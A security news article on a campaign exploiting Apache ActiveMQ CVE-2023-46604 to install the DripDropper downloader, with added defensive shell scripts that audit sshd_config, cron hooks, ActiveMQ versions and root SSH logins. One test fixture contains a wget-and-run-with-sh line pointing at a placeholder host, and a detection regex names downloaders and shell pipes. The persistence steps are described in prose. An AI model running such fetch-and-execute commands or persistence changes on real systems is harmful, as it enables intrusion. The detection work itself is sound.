Researchers at Red Canary report that attackers are exploiting a critical vulnerability in Apache ActiveMQ, one that was fixed upstream nearly two years ago but is still unpatched in many deployments, to gain persistent access to cloud-hosted Linux systems. Their goal is to install a newly identified downloader called DripDropper, which fetches further payloads onto the compromised host.
More unusually, after exploiting the flaw the attackers patched it themselves. The point is to lock out other groups scanning for the same bug, so that their own access stays exclusive and quiet for longer.
The flaw is CVE-2023-46604, rated CVSS 10.0, the highest possible severity. It is a deserialization bug in ActiveMQ's OpenWire protocol handler (TCP port 61616 in the default configuration): an unauthenticated attacker who can reach that port can make the broker instantiate an arbitrary class and run code on the host.
Fixed releases (5.15.16, 5.16.7, 5.17.6 and 5.18.3) shipped in October 2023, yet many organizations have still not upgraded. That gap has drawn a string of groups that use the flaw to deploy a range of malware on Linux hosts, including:
HelloKitty, a ransomware family known for destructive attacks.
Linux rootkits, which hide processes and files and keep the intrusion out of sight.
GoTitan, a Go-based botnet agent that gives its operators remote control of the system.
Godzilla, a web shell that gives attackers command execution on the host and a foothold for moving laterally across the network.
Once attackers are in, their next step is to secure full control. They modify the sshd configuration to permit root login over SSH (the PermitRootLogin directive controls this), which hands them elevated privileges and a reliable way back in. With root SSH access in hand they drop DripDropper, an ELF binary packed with PyInstaller, a common tool for bundling Python programs into stand-alone executables.
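The sshd change described above is easy to audit if you read the file the way sshd does. The script below is an added example, not code from the Red Canary report or from DripDropper; the two sshd_config files it checks are constructed for the demo, and it assumes the stock OpenSSH defaults (PermitRootLogin prohibit-password, PasswordAuthentication yes) when a keyword is absent.

```shell
#!/bin/sh
# Added example (not Red Canary's code): audit an sshd_config by reading the
# value sshd would actually use. sshd keeps the FIRST occurrence of a keyword,
# keywords are case-insensitive, and anything after a "Match" line is
# conditional, so the scan stops there.

# effective_sshd_option FILE KEYWORD -> prints the effective value, or nothing
effective_sshd_option() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/        { next }              # comment line
        NF == 0                 { next }              # blank line
        tolower($1) == "match"  { exit }              # conditional block: stop
        tolower($1) == key      { print $2; exit }    # first occurrence wins
    ' "$1"
}

# audit_sshd_config FILE -> prints findings; returns 1 if root login is enabled
audit_sshd_config() {
    f="$1"
    prl=$(effective_sshd_option "$f" PermitRootLogin)
    pa=$(effective_sshd_option "$f" PasswordAuthentication)
    # OpenSSH defaults when the keyword is absent or only present commented out
    prl=${prl:-prohibit-password}
    pa=${pa:-yes}
    if [ "$prl" = "yes" ]; then
        echo "FINDING: $f permits root login (PermitRootLogin $prl)"
        [ "$pa" = "yes" ] && echo "FINDING: $f also accepts passwords, so root can be brute-forced"
        return 1
    fi
    echo "ok: $f PermitRootLogin=$prl PasswordAuthentication=$pa"
    return 0
}

# --- constructed sample configs (not taken from any real host) ---
tmp=$(mktemp -d); trap 'rm -rf "$tmp"' EXIT
cat > "$tmp/sshd_config.clean" <<'EOF'
Include /etc/ssh/sshd_config.d/*.conf
#PermitRootLogin prohibit-password
PasswordAuthentication no
Match User deploy
    PasswordAuthentication yes
EOF
# The intruder's version: root login switched on, the default line left commented
cat > "$tmp/sshd_config.tampered" <<'EOF'
PermitRootLogin yes
PasswordAuthentication yes
#PermitRootLogin prohibit-password
EOF

audit_sshd_config "$tmp/sshd_config.clean"
audit_sshd_config "$tmp/sshd_config.tampered" || echo "=> root login enabled, investigate this host"
```

Two caveats a practitioner should keep in mind. Because the first occurrence wins, a file pulled in by an Include line at the top of sshd_config (the /etc/ssh/sshd_config.d/ directory on current Debian, Ubuntu and RHEL) takes precedence over everything below it, so check those files too. And on the host itself, `sshd -T` prints the effective configuration after all parsing, which is the authoritative answer; the script above is for offline review of files collected from many servers.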
This malware is more than a simple downloader; several features help it avoid detection and resist analysis:
It requires a password to run, so sandboxes and analysts who do not have the password cannot make it execute.
It polls Dropbox accounts controlled by the attackers for commands and additional payloads, so its traffic looks like ordinary HTTPS to a legitimate service.
It deploys two main files: one that handles the Dropbox communication and process monitoring, and another that modifies system configuration to maintain persistence.
One of DripDropper's most effective tricks is surviving reboots and cleanup attempts. To do so it modifies the 0anacron file in several cron directories:
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
Because 0anacron is a legitimate hook shipped by the anacron (cronie-anacron) package, its presence is normal; what changes is its content. The modified hook then runs on every schedule alongside routine housekeeping, where it is easy to overlook.
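Since the hook is supposed to exist, the useful check is what it contains. The script below is an added example, not code from the report or from the malware: it scans each 0anacron hook for commands that a distribution's anacron package would never put there (downloaders, decoders, interpreters, pipes into a shell). The sample hooks are constructed, and the download line in the tampered one is a placeholder, not DripDropper's actual command.

```shell
#!/bin/sh
# Added example (not Red Canary's code): flag 0anacron hooks whose content
# goes beyond running anacron. Sample hook bodies below are constructed.

# Commands that have no business in a cron housekeeping hook.
SUSPECT_RE='(curl|wget|base64|python|perl|nohup|/dev/tcp|dropbox|eval|[|] *(ba)?sh)'

# scan_cron_hook FILE -> prints flagged lines with line numbers; returns 1 if any
scan_cron_hook() {
    # grep -n keeps line numbers; the second grep drops matches inside comments
    hits=$(grep -nE "$SUSPECT_RE" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true)
    [ -z "$hits" ] && return 0
    printf 'FINDING %s:\n%s\n' "$1" "$hits"
    return 1
}

# audit_cron_hooks ETC -> scans ETC/cron.{hourly,daily,weekly,monthly}/0anacron
# Return value is the number of flagged hooks (0 means clean).
audit_cron_hooks() {
    flagged=0
    for period in hourly daily weekly monthly; do
        hook="$1/cron.$period/0anacron"
        [ -f "$hook" ] || continue        # not every distro installs every period
        scan_cron_hook "$hook" || flagged=$((flagged + 1))
    done
    return $flagged
}

# --- constructed sample tree (on a real host the hooks live under /etc) ---
root=$(mktemp -d); trap 'rm -rf "$root"' EXIT
mkdir -p "$root/etc/cron.hourly" "$root/etc/cron.daily"
# Shape of the stock hook: it only runs anacron
cat > "$root/etc/cron.daily/0anacron" <<'EOF'
#!/bin/sh
# Check whether 0anacron was run today already
if test -x /usr/sbin/anacron; then
    /usr/sbin/anacron -s
fi
EOF
# Same hook with a stage-2 fetch appended (placeholder URL, not a real indicator)
cat > "$root/etc/cron.hourly/0anacron" <<'EOF'
#!/bin/sh
if test -x /usr/sbin/anacron; then
    /usr/sbin/anacron -s
fi
# a curl mentioned in a comment does not count
wget -q -O /tmp/.x https://example.invalid/stage2 && sh /tmp/.x
EOF

rc=0; audit_cron_hooks "$root/etc" || rc=$?
echo "$rc hook(s) flagged"
```

Where the package manager's own checksums are available they are the better first step: `rpm -V cronie-anacron` on RPM-based systems and `dpkg --verify anacron` on Debian-based ones report any packaged file whose content differs from what was installed, and they catch edits this heuristic would miss. Use the scan above for collected copies, for hosts without the package database, and as a second opinion when a hook has been legitimately customized; in either case also check modification times and the rest of /etc/cron.d and the user crontabs.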
The second file keeps in contact with Dropbox, receives new instructions, and re-applies the SSH configuration changes if it notices they have been reverted. In other words, if you undo the change without removing the malware, it puts the change back.
One of the most curious, and concerning, details of the campaign is that the attackers patch the ActiveMQ vulnerability (CVE-2023-46604) themselves after exploiting it, so that nobody else can get in the way they did.
They apply the fix by downloading the patched ActiveMQ components from Apache Maven's repository, closing that route to future intruders without disturbing the access they already have. With other persistence in place (the cron hook and the modified SSH configuration) they no longer need the original flaw. For defenders this has a sharp consequence: finding a fixed version on a server is not evidence that the server was never compromised.
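The script below is an added example, not code from the report, for deciding what version of ActiveMQ a broker is actually running and whether it has the CVE-2023-46604 fix. It assumes the layout of the ActiveMQ Classic distribution, where lib/ holds JARs named activemq-<module>-<version>.jar, and it uses the fixed releases from the advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3; ActiveMQ 6.x shipped after the fix). It also reports when the JARs do not all carry one version, because a lib/ directory with a fixed activemq-client next to an older activemq-broker is what a hand-applied swap of individual JARs looks like, whoever did it. The sample lib/ directory is constructed.

```shell
#!/bin/sh
# Added example (not Red Canary's code): version check for CVE-2023-46604
# against the JAR names in an ActiveMQ lib/ directory.

# vulnerable_to_46604 VERSION -> returns 0 if VERSION lacks the fix, 1 if it has it
vulnerable_to_46604() {
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs     # split "5.18.2" into 5 18 2
    maj=$1; min=$2; pat=${3%%[!0-9]*}              # drop suffixes like -SNAPSHOT
    [ "$maj" -gt 5 ] && return 1                   # 6.x and later carry the fix
    [ "$maj" -lt 5 ] && return 0                   # everything before 5.15.16 is affected
    case "$min" in
        15) [ "${pat:-0}" -lt 16 ] ;;
        16) [ "${pat:-0}" -lt 7 ] ;;
        17) [ "${pat:-0}" -lt 6 ] ;;
        18) [ "${pat:-0}" -lt 3 ] ;;
        *)  [ "$min" -lt 15 ] ;;                   # older 5.x lines: no fix; newer: fixed
    esac
}

# activemq_jar_versions LIBDIR -> distinct version strings found in activemq-*.jar
activemq_jar_versions() {
    for jar in "$1"/activemq-*.jar; do
        [ -e "$jar" ] || continue
        name=${jar##*/}; name=${name%.jar}
        printf '%s\n' "${name##*-}"                # text after the last '-' is the version
    done | sort -u
}

# audit_activemq_lib LIBDIR -> returns 1 on a vulnerable version or a version mix
audit_activemq_lib() {
    versions=$(activemq_jar_versions "$1")
    [ -n "$versions" ] || { echo "no activemq-*.jar in $1"; return 1; }
    rc=0
    if [ "$(printf '%s\n' "$versions" | wc -l | tr -d ' ')" -gt 1 ]; then
        echo "FINDING: mixed ActiveMQ versions in $1 ($(printf '%s' "$versions" | tr '\n' ' ')): individual JARs were replaced"
        rc=1
    fi
    for v in $versions; do
        if vulnerable_to_46604 "$v"; then
            echo "FINDING: $v lacks the CVE-2023-46604 fix"; rc=1
        else
            echo "ok: $v has the fix"
        fi
    done
    return $rc
}

# --- constructed sample: two JARs swapped to a fixed build, one left behind ---
lib=$(mktemp -d); trap 'rm -rf "$lib"' EXIT
for j in activemq-client-5.18.3 activemq-openwire-legacy-5.18.3 activemq-broker-5.18.2; do
    : > "$lib/$j.jar"
done
audit_activemq_lib "$lib" || echo "=> review this broker and its change records"
```

A clean result from this check means the broker is no longer exploitable through CVE-2023-46604; it says nothing about what happened before the JARs changed. If the version on disk does not match your own change records, treat the host as compromised until the SSH configuration, cron hooks and logs say otherwise.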
This campaign is a clear reminder of the importance of staying vigilant. Some key recommendations for strengthening your infrastructure:
Apply patches promptly. Many active threats exploit known vulnerabilities that already have fixes; updating in time shuts the door before attackers walk in. In this case the fixed ActiveMQ releases have been available since October 2023.
Restrict access to internal services. Use IP allow-lists, VPNs, or other access controls so that only authorized users and systems can reach them. An ActiveMQ broker's OpenWire listener (TCP 61616 by default) and its web console should never be exposed to the internet.
Monitor your cloud and host logs. Visibility is critical: review logs regularly and look for the traces this campaign leaves, such as root logins over SSH, edits to sshd_config, and changes to files under the /etc/cron.* directories, before the damage escalates.
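The most direct trace of the intrusion described above is a successful root login over SSH from an address that has no business using root. The script below is an added example, not code from the report: it pulls root logins out of sshd's "Accepted" lines and flags sources missing from an allow-list. The log lines are constructed, use RFC 5737 documentation addresses, and follow the syslog format sshd writes to auth.log or secure; the allow-list is a plain file with one address per line.

```shell
#!/bin/sh
# Added example (not Red Canary's code): root SSH login detection over sshd
# log lines. Sample log lines and addresses below are constructed.

# root_ssh_logins LOGFILE -> one "ip count" line per source that logged in as root
root_ssh_logins() {
    awk '
        /sshd\[[0-9]+\]: Accepted / {
            # "... Accepted <method> for root from <ip> port <n> ssh2 ..."
            for (i = 3; i <= NF; i++)
                if ($i == "from" && $(i - 1) == "root" && $(i - 2) == "for")
                    seen[$(i + 1)]++
        }
        END { for (ip in seen) print ip, seen[ip] }
    ' "$1" | sort
}

# unexpected_root_logins LOGFILE ALLOWLIST -> prints offenders, returns 1 if any
unexpected_root_logins() {
    offenders=$(root_ssh_logins "$1" | awk '
        FILENAME == ARGV[1] { allow[$1] = 1; next }   # first input: the allow-list
        !($1 in allow)                                 # second input (stdin): "ip count"
    ' "$2" -)
    [ -z "$offenders" ] && return 0
    printf 'FINDING: root logins from sources not on the allow-list:\n%s\n' "$offenders"
    return 1
}

# --- constructed sample log and allow-list ---
log=$(mktemp); allow=$(mktemp); trap 'rm -f "$log" "$allow"' EXIT
cat > "$log" <<'EOF'
Aug 12 03:14:07 mq-prod-1 sshd[2417]: Accepted publickey for root from 198.51.100.7 port 50122 ssh2: ED25519 SHA256:REDACTED
Aug 12 03:21:55 mq-prod-1 sshd[2502]: Accepted password for root from 203.0.113.5 port 41800 ssh2
Aug 12 03:22:09 mq-prod-1 sshd[2519]: Accepted publickey for deploy from 192.0.2.10 port 2222 ssh2: RSA SHA256:REDACTED
Aug 12 03:40:31 mq-prod-1 sshd[2611]: Failed password for root from 203.0.113.5 port 41912 ssh2
Aug 12 04:02:48 mq-prod-1 sshd[2690]: Accepted password for root from 203.0.113.5 port 42330 ssh2
EOF
printf '198.51.100.7\n' > "$allow"      # the one bastion allowed to reach root

root_ssh_logins "$log"
unexpected_root_logins "$log" "$allow" || echo "=> correlate with sshd_config and cron changes on this host"
```

On systemd hosts the same lines come from `journalctl _COMM=sshd`. Run the check against logs shipped off the host, not the local file: an intruder with root can edit or truncate /var/log, and the first root login, the one that matters, is exactly what they would remove.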
DripDropper is carefully built malware. It does not just infect a host; it adapts, hides, and secures its persistence, all while keeping in touch with its operators through a legitimate service like Dropbox.
Threats like this show that keeping systems updated is necessary but not sufficient: key configurations and unusual behaviour need continuous monitoring as well.